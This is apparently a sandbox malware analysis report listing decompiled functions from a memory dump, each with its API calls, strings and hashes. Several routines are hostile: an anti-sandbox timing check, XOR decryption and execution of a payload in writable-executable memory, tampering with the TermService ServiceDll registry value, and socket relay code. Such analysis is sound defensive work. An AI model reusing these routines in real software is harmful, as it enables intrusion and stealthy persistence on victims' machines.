                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 64967091012ca3be463ff2ce303d0a86b5d73f2fd2893906bdc5862f7497788f
                                      • Instruction ID: 117b20f967412b430907f56f7d035ec3b17419d1650f063edd3172b71aa5bef5
                                      • Opcode Fuzzy Hash: 64967091012ca3be463ff2ce303d0a86b5d73f2fd2893906bdc5862f7497788f
                                      • Instruction Fuzzy Hash: EEE0D870A8020C15CF356BF5AC0BBE73BA81F42744F0401F9A152F11C0DA7CC98ACAE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E0040D279() {
                                      				intOrPtr _v272;
                                      				intOrPtr _v284;
                                      				char _v288;
                                      				struct HINSTANCE__* _t5;
                                      				_Unknown_base(*)()* _t8;
                                      
                                      				_v288 = 0x11c;
                                      				_t5 = LoadLibraryA("ntdll.dll");
                                      				if(_t5 == 0) {
                                      					L3:
                                      					if(_v272 != 2) {
                                      						goto L5;
                                      					} else {
                                      						return _v284;
                                      					}
                                      				} else {
                                      					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                      					if(_t8 == 0) {
                                      						L5:
                                      						return 0;
                                      					} else {
                                      						 *_t8( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}








                                      0x0040d287
                                      0x0040d291
                                      0x0040d299
                                      0x0040d2b4
                                      0x0040d2bb
                                      0x00000000
                                      0x0040d2bd
                                      0x0040d2c4
                                      0x0040d2c4
                                      0x0040d29b
                                      0x0040d2a1
                                      0x0040d2a9
                                      0x0040d2c5
                                      0x0040d2c8
                                      0x0040d2ab
                                      0x0040d2b2
                                      0x00000000
                                      0x0040d2b2
                                      0x0040d2a9

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D291
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D2A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: d7824df8614f9b0efb3c46f3d5247e345fb4ffd86b33bc06f85d5c1a7d7fc120
                                      • Instruction ID: c27852d06fb29ab0cd027fb9d2e63a841b101ce654ee04220e336b10604338cb
                                      • Opcode Fuzzy Hash: d7824df8614f9b0efb3c46f3d5247e345fb4ffd86b33bc06f85d5c1a7d7fc120
                                      • Instruction Fuzzy Hash: 24E01230A4021C56DB24ABF1AC0ABD777A46B45748F0045E9A605E11C1DAB8D989CFD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 40%
                                      			E0040E721(intOrPtr* __ecx) {
                                      				signed int _v8;
                                      				_Unknown_base(*)()* _t6;
                                      				intOrPtr* _t12;
                                      
                                      				_push(__ecx);
                                      				_v8 = _v8 & 0x00000000;
                                      				_t12 = __ecx;
                                      				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                      				if(_t6 != 0) {
                                      					 *_t6( *_t12,  &_v8);
                                      				}
                                      				return _v8;
                                      			}






                                      0x0040e724
                                      0x0040e725
                                      0x0040e734
                                      0x0040e73d
                                      0x0040e745
                                      0x0040e74d
                                      0x0040e74d
                                      0x0040e754

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040D795,?,?,00402B66,?,00412428,?,?), ref: 0040E736
                                      • GetProcAddress.KERNEL32(00000000,?,?,?,0040D795,?,?,00402B66,?,00412428,?,?), ref: 0040E73D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1646373207-3789238822
                                      • Opcode ID: daa59590f0409d85a6d0c8b829a52e8d91f30d11b18e7659024770b728c280be
                                      • Instruction ID: ebc29d562f1187ef1a98fba33f7c5dc42ac0c4bc1182f8b569bc78a6ab039afe
                                      • Opcode Fuzzy Hash: daa59590f0409d85a6d0c8b829a52e8d91f30d11b18e7659024770b728c280be
                                      • Instruction Fuzzy Hash: 45E08671600204FBDB14DBA1DD09FDE777CEB44355B100059A511E2140D7B89A00D758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E0040B2C2(signed int* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* _t22;
                                      				void* _t23;
                                      				void* _t33;
                                      				struct _CRITICAL_SECTION* _t43;
                                      				signed int* _t59;
                                      				intOrPtr _t62;
                                      				void* _t66;
                                      
                                      				_t45 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t59 = __ecx;
                                      				_t43 = __ecx + 0x3d8;
                                      				EnterCriticalSection(_t43);
                                      				_t67 = _t59[0x7b];
                                      				_t62 = _a4;
                                      				if(_t59[0x7b] != 0) {
                                      					L2:
                                      					_t69 = _t59[3];
                                      					if(_t59[3] != 0) {
                                      						L5:
                                      						_t63 =  &(_t59[0xf1]);
                                      						_t22 = E004020D3( &(_t59[0xf1]), 0);
                                      						__eflags = _t22;
                                      						if(_t22 == 0) {
                                      							E00401EB9(_t63);
                                      						}
                                      						_t23 = E004020D3( &(_t59[0xf3]), 0);
                                      						__eflags = _t23;
                                      						if(_t23 == 0) {
                                      							E00401EB9( &(_t59[0xf3]));
                                      						}
                                      						_v12 = _t59[4];
                                      						_v8 = _t59[0x7c];
                                      						E00401E8E(_t63, E0040B1E8,  &_v12);
                                      						E00401E8E( &(_t59[0xf3]), E0040B255,  &_v12);
                                      						 *_t59 = 1;
                                      						LeaveCriticalSection(_t43);
                                      						E004020D3( &(_t59[0xf1]), 0xffffffff);
                                      						E004020D3( &(_t59[0xf3]), 0xffffffff);
                                      						EnterCriticalSection(_t43);
                                      						 *_t59 =  *_t59 & 0x00000000;
                                      						LeaveCriticalSection(_t43);
                                      						E0040B46D(_t59);
                                      						_t33 = 0;
                                      						__eflags = 0;
                                      					} else {
                                      						E004031BB(_t66, _t62);
                                      						if(E00405294( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
                                      							goto L5;
                                      						} else {
                                      							goto L4;
                                      						}
                                      					}
                                      				} else {
                                      					E004031BB(_t66, _t62 + 8);
                                      					if(E00405294( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
                                      						L4:
                                      						LeaveCriticalSection(_t43);
                                      						_t33 = 1;
                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      				return _t33;
                                      			}












                                      0x0040b2c2
                                      0x0040b2c5
                                      0x0040b2c6
                                      0x0040b2ca
                                      0x0040b2cc
                                      0x0040b2d3
                                      0x0040b2d9
                                      0x0040b2e0
                                      0x0040b2e3
                                      0x0040b303
                                      0x0040b303
                                      0x0040b307
                                      0x0040b330
                                      0x0040b330
                                      0x0040b33a
                                      0x0040b33f
                                      0x0040b341
                                      0x0040b345
                                      0x0040b345
                                      0x0040b352
                                      0x0040b357
                                      0x0040b359
                                      0x0040b361
                                      0x0040b361
                                      0x0040b36b
                                      0x0040b374
                                      0x0040b380
                                      0x0040b394
                                      0x0040b3a0
                                      0x0040b3a6
                                      0x0040b3b0
                                      0x0040b3bd
                                      0x0040b3c3
                                      0x0040b3c9
                                      0x0040b3cd
                                      0x0040b3d1
                                      0x0040b3d6
                                      0x0040b3d6
                                      0x0040b309
                                      0x0040b310
                                      0x0040b31f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040b31f
                                      0x0040b2e5
                                      0x0040b2ef
                                      0x0040b301
                                      0x0040b321
                                      0x0040b322
                                      0x0040b32a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040b301
                                      0x0040b3dc

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0040B2D3
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040B322
                                        • Part of subcall function 004031BB: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,0040290F,?,?,00000000,exit,00000000,start), ref: 004031E0
                                        • Part of subcall function 00405294: getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
                                        • Part of subcall function 00405294: socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
                                        • Part of subcall function 00405294: htons.WS2_32(?), ref: 0040531E
                                        • Part of subcall function 00405294: freeaddrinfo.WS2_32(00000000), ref: 0040532E
                                        • Part of subcall function 00405294: connect.WS2_32(?,?,00000010), ref: 0040533A
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040B3A6
                                      • EnterCriticalSection.KERNEL32(?), ref: 0040B3C3
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040B3CD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                      • String ID:
                                      • API String ID: 4195813003-0
                                      • Opcode ID: d2186f9b9d468435da629a9d53f3a80bb8ac4522cff6a878c83fd27f552db59a
                                      • Instruction ID: c014d6a5cbc9cc62c5e1f3a19af2f51ba3110d45d10fa0418e49f0bc623e5669
                                      • Opcode Fuzzy Hash: d2186f9b9d468435da629a9d53f3a80bb8ac4522cff6a878c83fd27f552db59a
                                      • Instruction Fuzzy Hash: A4316171200606BBD704EBA2DD55BAAB7ACEF04354F10413AE919A21D1DB78AA14CBDC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 25%
                                      			E0040D07E(void* __ecx, void* __edx) {
                                      				signed int _v8;
                                      				char _v2056;
                                      				signed int* _t9;
                                      				signed int _t15;
                                      				char* _t16;
                                      				void* _t17;
                                      				void* _t22;
                                      				void* _t23;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t9 =  &_v8;
                                      				_t23 = __ecx;
                                      				_t22 = __edx;
                                      				__imp__#10(__ecx, 0x4004667f, _t9);
                                      				if(_t9 == 0xffffffff) {
                                      					L4:
                                      					return 0;
                                      				}
                                      				if(_v8 == 0) {
                                      					Sleep(1);
                                      					L7:
                                      					return 1;
                                      				}
                                      				E00401052( &_v2056, 0, 0x800);
                                      				_t15 =  &_v2056;
                                      				__imp__#16(_t23, _t15, 0x800, 0, _t17);
                                      				_v8 = _t15;
                                      				if(_t15 == 0) {
                                      					goto L4;
                                      				}
                                      				_t16 =  &_v2056;
                                      				__imp__#19(_t22, _t16, _t15, 0);
                                      				if(_t16 > 0) {
                                      					goto L7;
                                      				}
                                      				goto L4;
                                      			}











                                      0x0040d087
                                      0x0040d08b
                                      0x0040d091
                                      0x0040d093
                                      0x0040d09b
                                      0x0040d0a4
                                      0x0040d0f2
                                      0x00000000
                                      0x0040d0f2
                                      0x0040d0aa
                                      0x0040d0fa
                                      0x0040d100
                                      0x00000000
                                      0x0040d102
                                      0x0040d0bc
                                      0x0040d0c4
                                      0x0040d0cf
                                      0x0040d0d5
                                      0x0040d0db
                                      0x00000000
                                      0x00000000
                                      0x0040d0e0
                                      0x0040d0e8
                                      0x0040d0f0
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0040D09B
                                      • recv.WS2_32(00000000,?,00000800,00000000), ref: 0040D0CF
                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 0040D0E8
                                      • Sleep.KERNEL32(00000001), ref: 0040D0FA
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleepioctlsocketrecvsend
                                      • String ID:
                                      • API String ID: 1168213214-0
                                      • Opcode ID: 6210963b8d8057c04443d269ffda838e3d902a4b0fba95c3aac5bbc1c3d01664
                                      • Instruction ID: 701ac5b725064c4b0a4fbc5e1cd44647a3ae98db76a5d922a0a67313ee472f7f
                                      • Opcode Fuzzy Hash: 6210963b8d8057c04443d269ffda838e3d902a4b0fba95c3aac5bbc1c3d01664
                                      • Instruction Fuzzy Hash: 270188B1940114BBE72097B49D49FEF36ACEB44315F148072B615E11C0EBB88E0997AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040CA7E(void* __ecx) {
                                      				void* _t14;
                                      				long _t15;
                                      				void** _t26;
                                      				void* _t27;
                                      
                                      				_t27 = __ecx;
                                      				_t1 = _t27 + 0x14; // 0x41658c
                                      				_t26 = _t1;
                                      				if( *_t26 == 0) {
                                      					L6:
                                      					_t5 = _t27 + 0x10; // 0x416588
                                      					E0040CC81(_t5);
                                      					_t6 = _t27 + 4; // 0x41657c
                                      					E0040CC81(_t6);
                                      					_t7 = _t27 + 0xc; // 0x416584
                                      					E0040CC81(_t7);
                                      					_t8 = _t27 + 8; // 0x416580
                                      					_t14 = E0040CC81(_t8);
                                      					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
                                      					return _t14;
                                      				}
                                      				_t15 = GetCurrentThreadId();
                                      				_t2 = _t27 + 0x18; // 0x0
                                      				if(_t15 ==  *_t2) {
                                      					L5:
                                      					E0040CC81(_t26);
                                      					goto L6;
                                      				}
                                      				if( *(_t27 + 0x10) == 0) {
                                      					return _t15;
                                      				}
                                      				_t4 = _t27 + 0x10; // 0x0
                                      				SetEvent( *_t4);
                                      				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
                                      					TerminateThread( *_t26, 0xfffffffe);
                                      				}
                                      				goto L5;
                                      			}







                                      0x0040ca7f
                                      0x0040ca82
                                      0x0040ca82
                                      0x0040ca88
                                      0x0040cac9
                                      0x0040cac9
                                      0x0040cacc
                                      0x0040cad1
                                      0x0040cad4
                                      0x0040cad9
                                      0x0040cadc
                                      0x0040cae1
                                      0x0040cae4
                                      0x0040cae9
                                      0x00000000
                                      0x0040cae9
                                      0x0040ca8a
                                      0x0040ca90
                                      0x0040ca93
                                      0x0040cac2
                                      0x0040cac4
                                      0x00000000
                                      0x0040cac4
                                      0x0040ca99
                                      0x0040caef
                                      0x0040caef
                                      0x0040ca9b
                                      0x0040ca9e
                                      0x0040cab6
                                      0x0040cabc
                                      0x0040cabc
                                      0x00000000

                                      APIs
                                      • GetCurrentThreadId.KERNEL32(?,00000000,00402904,00000000,exit,00000000,start), ref: 0040CA8A
                                      • SetEvent.KERNEL32(00000000), ref: 0040CA9E
                                      • WaitForSingleObject.KERNEL32(0041658C,00001388), ref: 0040CAAB
                                      • TerminateThread.KERNEL32(0041658C,000000FE), ref: 0040CABC
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                      • String ID:
                                      • API String ID: 2174867186-0
                                      • Opcode ID: 7b442c0c348a819acb6947a42034595b9fbd188a55982e7555e59c211741bb57
                                      • Instruction ID: ac5dfd55fb854e65227195a4494322577c45a772729071e2d18f3cd1317e2fa1
                                      • Opcode Fuzzy Hash: 7b442c0c348a819acb6947a42034595b9fbd188a55982e7555e59c211741bb57
                                      • Instruction Fuzzy Hash: 79016931500600DFE730EF21D899BAB77B2FF54311F584B3EE456A18E0DBB86999DA48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040BF64(void* __edx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				short* _v16;
                                      				int _v20;
                                      				char _v24;
                                      				void* _t28;
                                      				void* _t46;
                                      				int _t48;
                                      
                                      				_t46 = __edx;
                                      				_v8 = 0;
                                      				E004033AB( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
                                      					L3:
                                      					_t48 = 0;
                                      				} else {
                                      					_t28 = E0040EAAE( &_v8, _t46, E004033AB( &_v12, L"ServiceDll"),  &_v24);
                                      					E004058FB(_v12);
                                      					if(_t28 != 0) {
                                      						_t48 = E0040300E(E00402CA1( &_v24, __eflags,  &_v12), 0x417cfc);
                                      						E004058FB(_v12);
                                      						_v12 = 0;
                                      					} else {
                                      						E0040EA99( &_v8);
                                      						goto L3;
                                      					}
                                      				}
                                      				E00402DFF( &_v24);
                                      				E004058FB(_v16);
                                      				E0040EA99( &_v8);
                                      				return _t48;
                                      			}











                                      0x0040bf64
                                      0x0040bf76
                                      0x0040bf79
                                      0x0040bf81
                                      0x0040bf8e
                                      0x0040bf9e
                                      0x0040bfd0
                                      0x0040bfd0
                                      0x0040bfa0
                                      0x0040bfb5
                                      0x0040bfbf
                                      0x0040bfc6
                                      0x0040c00b
                                      0x0040c00d
                                      0x0040c012
                                      0x0040bfc8
                                      0x0040bfcb
                                      0x00000000
                                      0x0040bfcb
                                      0x0040bfc6
                                      0x0040bfd5
                                      0x0040bfdd
                                      0x0040bfe5
                                      0x0040bfef

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040BF96
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
                                        • Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                      Strings
                                      • ServiceDll, xrefs: 0040BFA4
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BF71
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 1903904756-387424650
                                      • Opcode ID: 77223e9beb28355393e47e515ecd4fd42c2d64bfc197a7d1dfd1193c3d2e0f9c
                                      • Instruction ID: 9765c8c69e09662c28479e68e5e47569de507f49e674c72ea32b24ba61643531
                                      • Opcode Fuzzy Hash: 77223e9beb28355393e47e515ecd4fd42c2d64bfc197a7d1dfd1193c3d2e0f9c
                                      • Instruction Fuzzy Hash: 03115171E00209BACB14EBA2DD568EEBB78EF84305F10007EA801B32C1DB785F05DB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040BAFB(void* __ecx, void* __edx) {
                                      				void* _v12;
                                      				void* _v16;
                                      				short* _v20;
                                      				int _v24;
                                      				char _v28;
                                      				char _v36;
                                      				void* _t26;
                                      				void* _t28;
                                      				void* _t43;
                                      				int _t44;
                                      				void* _t45;
                                      
                                      				_t43 = __edx;
                                      				_t45 = __ecx;
                                      				_t44 = 0;
                                      				_v12 = 0;
                                      				E004033AB( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                      					_t26 = E00402FE7(_t45 + 0x34, _t43,  &_v36);
                                      					_t28 = E0040EB18( &_v12, E004033AB( &_v16, L"ServiceDll"), _t26, 2);
                                      					E004058FB(_v16);
                                      					_v16 = 0;
                                      					E00402DFF( &_v36);
                                      					E0040EA99( &_v12);
                                      					if(_t28 != 0) {
                                      						_t44 = 1;
                                      					}
                                      				}
                                      				E00402DFF( &_v28);
                                      				E004058FB(_v20);
                                      				E0040EA99( &_v12);
                                      				return _t44;
                                      			}














                                      0x0040bafb
                                      0x0040bb03
                                      0x0040bb05
                                      0x0040bb0f
                                      0x0040bb12
                                      0x0040bb1a
                                      0x0040bb27
                                      0x0040bb37
                                      0x0040bb42
                                      0x0040bb59
                                      0x0040bb63
                                      0x0040bb6b
                                      0x0040bb6e
                                      0x0040bb76
                                      0x0040bb7d
                                      0x0040bb7f
                                      0x0040bb7f
                                      0x0040bb7d
                                      0x0040bb83
                                      0x0040bb8b
                                      0x0040bb93
                                      0x0040bb9d

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040BB2F
                                        • Part of subcall function 0040EB18: RegSetValueExW.ADVAPI32 ref: 0040EB37
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                      Strings
                                      • ServiceDll, xrefs: 0040BB48
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040BB07
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 2854241163-387424650
                                      • Opcode ID: 0418c3ef56162aff305e291369424664bf30e5ff3999472e6f600fbeff4a7626
                                      • Instruction ID: c990f0b02173a94c8d8364d914472c003d83b5c301375739e1ad41474b62aec1
                                      • Opcode Fuzzy Hash: 0418c3ef56162aff305e291369424664bf30e5ff3999472e6f600fbeff4a7626
                                      • Instruction Fuzzy Hash: 081142719002196BCB14FB92CC56DFFBB78EF94304F40447EE902721C1DB785A45CA58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 66%
                                      			E00401000(struct HINSTANCE__* _a4, long _a12) {
                                      				int _v8;
                                      				char _v12;
                                      				struct _PROCESS_INFORMATION _v28;
                                      				struct tagMSG _v56;
                                      				struct _STARTUPINFOW _v124;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				long _t34;
                                      				long _t35;
                                      				WCHAR* _t37;
                                      				void* _t39;
                                      				int _t45;
                                      				int _t47;
                                      				struct HWND__* _t52;
                                      				int _t62;
                                      				void* _t66;
                                      				long _t68;
                                      				void* _t76;
                                      				struct HINSTANCE__* _t77;
                                      				struct HACCEL__* _t78;
                                      				long _t79;
                                      				long _t80;
                                      				struct HWND__** _t81;
                                      				signed int _t82;
                                      				void* _t88;
                                      				signed int _t89;
                                      				void* _t93;
                                      
                                      				_t34 = GetTickCount();
                                      				Sleep(0x2be); // executed
                                      				_t35 = GetTickCount();
                                      				_t96 = _t35 - _t34 - 0x2bc;
                                      				if(_t35 - _t34 < 0x2bc) {
                                      					L4:
                                      					_t37 = GetCommandLineW();
                                      					0x400000(_t37);
                                      					if(_t37 == 0) {
                                      						_t39 = GetCurrentProcess();
                                      						__imp__IsWow64Process(_t39,  &_v8);
                                      						__eflags = _t39;
                                      						if(_t39 == 0) {
                                      							L11:
                                      							__imp__#17();
                                      							_t77 = _a4;
                                      							LoadStringW(_t77, 0x67, 0x40cee0, 6);
                                      							LoadStringW(_t77, 0xa1, 0x40dd40, 9);
                                      							 *0x40dd3c = _t77;
                                      							__eflags = _a12;
                                      							if(_a12 == 0) {
                                      								goto L5;
                                      							}
                                      							_t78 = LoadAcceleratorsW(_t77, 0x6d);
                                      							while(1) {
                                      								_t45 = GetMessageW( &_v56, 0, 0, 0);
                                      								__eflags = _t45;
                                      								if(_t45 == 0) {
                                      									break;
                                      								}
                                      								_t47 = TranslateAcceleratorW( *0x40ddc0, _t78,  &_v56);
                                      								__eflags = _t47;
                                      								if(_t47 != 0) {
                                      									continue;
                                      								}
                                      								__eflags = _v56.message - 0x100;
                                      								if(_v56.message != 0x100) {
                                      									L18:
                                      									TranslateMessage( &_v56);
                                      									DispatchMessageW( &_v56);
                                      									continue;
                                      								}
                                      								__eflags = _v56.wParam - 9;
                                      								if(_v56.wParam != 9) {
                                      									goto L18;
                                      								}
                                      								_t52 = GetParent(_v56);
                                      								_t81 =  *0x400000; // 0x905a4d
                                      								__eflags = _t52 -  *_t81;
                                      								if(_t52 !=  *_t81) {
                                      									goto L18;
                                      								}
                                      								PostMessageW( *_t81, 0x111, 0x8067, 0);
                                      							}
                                      							DestroyMenu( *0x40ddc4);
                                      							return _v56.wParam;
                                      						}
                                      						__eflags = _v8;
                                      						if(_v8 == 0) {
                                      							goto L11;
                                      						}
                                      						_t79 = 0x44;
                                      						E00401A70( &_v124, 0, _t79);
                                      						_v124.cb = _t79;
                                      						__imp__Wow64DisableWow64FsRedirection( &_v12);
                                      						_t62 = CreateProcessW(L"C:\\windows\\regedit.exe", GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v124,  &_v28);
                                      						__eflags = _t62;
                                      						if(_t62 == 0) {
                                      							__imp__Wow64RevertWow64FsRedirection(_v12);
                                      							goto L11;
                                      						}
                                      						WaitForSingleObject(_v28.hProcess, 0xffffffff);
                                      						GetExitCodeProcess(_v28,  &_a12);
                                      						ExitProcess(_a12);
                                      					}
                                      					L5:
                                      					return 0;
                                      				}
                                      				_t66 = E00401A4F(_a12, L"rb"); // executed
                                      				_push(2);
                                      				_t88 = _t66;
                                      				_push(0);
                                      				_push(_t88); // executed
                                      				E00401915(_t76, _t88, 0, _t96); // executed
                                      				_push(_t88);
                                      				_t68 = E00401826(_t76, _t88, 0, _t96);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t88);
                                      				_t80 = _t68;
                                      				E00401915(_t80, _t88, 0, _t96);
                                      				_a12 = VirtualAlloc(0, _t80, 0x3000, 0x40);
                                      				E00401675(_t70, _t80, 1, _t88);
                                      				_t93 = _t93 + 0x34;
                                      				_t82 = 0;
                                      				if(_t80 <= 0) {
                                      					L3:
                                      					_a12();
                                      					goto L4;
                                      				} else {
                                      					goto L2;
                                      				}
                                      				do {
                                      					L2:
                                      					asm("cdq");
                                      					_t89 = 0xc;
                                      					 *(_t82 + _a12) =  *(_t82 + _a12) ^  *("248058040134" + _t82 % _t89);
                                      					_t82 = _t82 + 1;
                                      				} while (_t82 < _t80);
                                      				goto L3;
                                      			}
































                                      0x0040100f
                                      0x00401018
                                      0x0040101e
                                      0x00401024
                                      0x00401029
                                      0x00401097
                                      0x0040109d
                                      0x004010a0
                                      0x004010a7
                                      0x004010b4
                                      0x004010bb
                                      0x004010c1
                                      0x004010c3
                                      0x00401132
                                      0x00401132
                                      0x00401138
                                      0x0040114b
                                      0x0040115a
                                      0x0040115c
                                      0x00401162
                                      0x00401165
                                      0x00000000
                                      0x00000000
                                      0x0040117a
                                      0x004011de
                                      0x004011e5
                                      0x004011e7
                                      0x004011e9
                                      0x00000000
                                      0x00000000
                                      0x00401189
                                      0x0040118f
                                      0x00401191
                                      0x00000000
                                      0x00000000
                                      0x00401193
                                      0x0040119a
                                      0x004011ca
                                      0x004011ce
                                      0x004011d8
                                      0x00000000
                                      0x004011d8
                                      0x0040119c
                                      0x004011a0
                                      0x00000000
                                      0x00000000
                                      0x004011a5
                                      0x004011ab
                                      0x004011b1
                                      0x004011b3
                                      0x00000000
                                      0x00000000
                                      0x004011c2
                                      0x004011c2
                                      0x004011f1
                                      0x00000000
